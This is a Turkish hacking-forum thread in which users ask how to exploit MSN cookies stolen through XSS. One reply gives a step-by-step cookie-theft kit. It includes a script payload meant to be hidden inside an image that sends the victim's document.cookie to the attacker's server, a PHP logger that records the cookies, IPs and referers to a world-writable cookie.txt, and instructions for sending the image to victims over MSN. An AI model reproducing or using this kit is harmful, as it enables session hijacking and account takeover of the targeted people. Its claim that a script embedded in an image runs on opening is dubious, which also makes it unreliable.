Cookie Çözme Yöntemi
-
sa. müritler
xss açığıyla aldığım msn cookie kodlarını nasıl değerlendirebilirim? biraz yabancı dilimizle son aşamasına gaddar geldik ama gerisi gelmedi :D bilen müritler vardır umarım. -
ehe en azından cookie çalıon ben onu da yapamıom.ama bilen warsa da sölemez :)
-
xss mi
la okadar ugraştim kaç gündür yapamadim hiç birşey :S sen nasi yaptin :D -
ehueheue teveccühlerinize layık olmaya çalışacağım :D ama son aşama kafamı çikti :S çözemedim...
-
neyle caldınkı kodu bızede yollasana :)
-
sordunuz da söylemedik mi cookies çalmayı..
yapacagınız şeyler
resmin arkasına kodu eklemek
kurbana o resmi açtırmak
php kodunun çalıştırmasını sağlamak..
1. Resmin arkasına eklenilecek kod
" büyüktür " script " küçüktür "window.navigate("http://www.adresiniz.com/cookie.php?data="+do
cument.cookie) " büyüktür " /script> " küçüktür "
" burada adresi editliceksiniz bide php kodunuzun adını editliceksiniz " cookie " i sizin ki neyse onu yapin cookies asd gibi..
" büyüktür " , " küçüktür " yazan yerlere o işaretleri koyun " işaretlerini silerek.. burada onlar yasak oldugundan yazamıyom..
"bu kodu eklemek için herhangibir resmi notepad de falan açın içindeki salak karakterleri silin onu ekleyin.. sonra aynı şekilde üstüne kaydedin.. : )
2. cookie kodunu yani cookie.php yapma...
kodlar şunlar
" küçüktür "?php $cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookie.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
? "büyüktür"
3. cooki leri loglaması için cookie.php yi koydugunuz dizine ( hostinginizdeki ) cookie.txt diye bi metin belgesi açın.. CHMOD unuda ( izinleri ) 777 yapın...
4. en son olarakta..
kurbana yedirme şekli
kod ueklediğiniz resmi göndericeksiniz msn le gönderin web hostinginizin içine atın. web sayfanıza koyun :D ne bok yerseniz yeyin.. ama imageshack gibi ( diğerlerini bilmiyom burda denedim sadece ) free image yerlerine atmayın ( ki atamazsınız izin vermiyor ) resmi açtıgı gibi açılmıcak ama resim o isteği gönderdiği gibi cooki bilgileriniz.. cookie.txt ye loglanıcak ordan bakabilirsiniz..
bu bu kadar uzun sürmezdi ama en amatör şekilde anlattım.. -
-
bilmiosan cwp yazma...(: resmin içine kod sokma filan hiç duymadın görmedin heralde... yada önce bi dene çalışıyomu die...
-
-
dur bekel resme sokim sonra sana sokucam o kodu...
-
tam hatırlamiorumda... böle cookiemi çalınır lem resimle script çalıştırıo adam.. falan filan salla ya...
Toplam Hit: 4052 Toplam Mesaj: 21